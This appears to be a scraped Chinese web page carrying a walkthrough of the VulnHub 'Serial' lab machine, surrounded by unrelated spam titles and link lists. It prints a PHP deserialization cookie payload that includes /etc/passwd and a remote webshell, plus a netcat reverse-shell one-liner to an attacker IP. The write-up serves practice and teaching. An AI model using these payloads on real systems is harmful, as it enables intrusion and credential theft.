当前位置: 首页 > news >正文

辽宁省交通建设投资集团官方网站天气预报权威发布

辽宁省交通建设投资集团官方网站,天气预报权威发布,江苏省住房和城乡建设局网站首页,wordpress接入qq互联一.信息收集 靶机地址下载:https://download.vulnhub.com/serial/serial.zip 打开靶机,在kali虚拟机中进行主机存活探测 可以知道靶机ip地址为192.168.133.171 然后扫描端口 可以发现有一个22端口跟80端口 然后接下来用kali扫描它的目录 可以发现有一…

一.信息收集

靶机地址下载:https://download.vulnhub.com/serial/serial.zip

打开靶机,在kali虚拟机中进行主机存活探测

可以知道靶机ip地址为192.168.133.171

然后扫描端口 可以发现有一个22端口跟80端口

然后接下来用kali扫描它的目录 

可以发现有一个可访问的目录 我们去访问一下

访问之后backup目录下有一个bak.zip 下载下来

下载下来之后有三个文件  分析一下

index.php

<?php
    include("user.class.php");

    if(!isset($_COOKIE['user'])) {
        setcookie("user", base64_encode(serialize(new User('sk4'))));
    } else {
        unserialize(base64_decode($_COOKIE['user']));
    }
    echo "This is a beta test for new cookie handler\n";
?>

log.class.php

<?php
  class Log {
    private $type_log;

    function __costruct($hnd) {
      $this->$type_log = $hnd;
    }

    public function handler($val) {
      include($this->type_log);
      echo "LOG: " . $val;
    }
  }
?>

user.class.php

<?php
  include("log.class.php");

  class Welcome {
    public function handler($val) {
      echo "Hello " . $val;
    }
  }

  class User {
    private $name;
    private $wel;

    function __construct($name) {
      $this->name = $name;
      $this->wel = new Welcome();
    }

    function __destruct() {
      //echo "bye\n";
      $this->wel->handler($this->name);
    }
  }

?>

 提示cookie,burpsuite抓包看一下cookie

cookie那里有一串base64加密的 解密一下

base64解码得到序列化后字段是

O:4:"User":2:{s:10:"Username";s:3:"sk4";s:9:"Userwel";O:7:"Welcome":0:{}}

 然后我们构造payload 读取/etc/passwd文件

O:4:"User":2:{s:10:"\x00User\x00name";s:5:"admin";s:9:"\x00User\x00wel";O:3:"Log":1:{s:8:"type_log";s:11:"/etc/passwd";}}')

base64编码

Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjM6InNrNCI7czo5OiIAVXNlcgB3ZWwiO086MzoiTG9nIjoxOntzOjg6InR5cGVfbG9nIjtzOjExOiIvZXRjL3Bhc3N3ZCI7fX0=

 然后再次抓包 打开用burp的repeater

将加密后的替换一下 就可以看到  然后成功包含  看到有一个sk4用户可登陆

get shell

构造序列化语句上传shell

生成一个shell放在本地网站下

然后构造payload,尝试读取passwd文件,payload如下 新创建一个1.php在本地的www下 然后 把type_log参数后面记得改成自己上传到本地的一句话木马

<?phpclass Log {private $type_log = "/etc/passwd";}class User {private $name = "admin";private $wel;function __construct() {$this->wel = new Log();}
}
$obj = new User();
echo base64_encode(serialize($obj));

然后去访问自己新创建的php 我这里用的是7.php 打开就看到他的base64编码

然后去抓包 把访问7.php得到的base64编码 替换cookie

成功执行

开始反弹shell

rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f|/bin/sh+-i+2>&1|nc+1192.168.133.163+6666+>/tmp/f

将上述代码url编码后填入参数位置

然后在kali里开启监听监听成功 

在攻击模块发送 成功获取shell

查看文件,多返回几次上级目录,找到一个txt文件

查看文件得到他的账号跟密码

最后在远程连接 成功进入

http://www.yayakq.cn/news/65240/

相关文章:

  • 成都行业网站定制网络开发改版
  • 品牌展示型网站源码网站建设数据库是什么
  • 和拓者设计吧类似的网站ps做网站logo尺寸
  • 有后台的网站网站设计的技术方案
  • 深圳网站建设deyond南京公司网站开发
  • 郑州网站制作公司东莞最好的网站建设价格低
  • 建站平台是给谁用的营销推广的工作内容
  • 安全狗 网站打不开贵阳建设工程信息网站
  • 移动端cpu太极seo
  • 丰台手机网站设计公司wordpress防黑客插件
  • 房地产免费网站建设镇江有几个区
  • 中国品牌网站官网邢台兼职网站有哪些?
  • word超链接网站怎样做海誉网站定制
  • 怎么向企业推销网站建设石家庄做网站百度推广
  • 大学什么专业做网站海天网站建设
  • 吴中区网站建设技术建设工程公司名字
  • 建立一个公司自己的网站平台网站建设
  • 品牌型网站开发公司网站建设多少费用济南兴田德润评价
  • 网站改版介绍创建网站平台要多少钱
  • 网站首页浮动广告怎么做常州外贸人才网
  • 免费建网站空间邢台建站
  • 昆明网站建设优化企业国信网络模版网站建设方案相关
  • 自考大型网站开发工具asp.net网站恢复
  • 济南免费做网站网站建设服务58
  • 本机做网站服务上传到网站建设合同 文库
  • edge网页视频怎么下载seo外链群发网站
  • 怎样优古网络公司网站后台域名抢注网站是怎么
  • C 建设个人网站做网站好接活吗
  • 福建省建设执业注册资格管理中心网站凡客诚品倒闭了吗知乎
  • 本地成都网站建设网站创作思路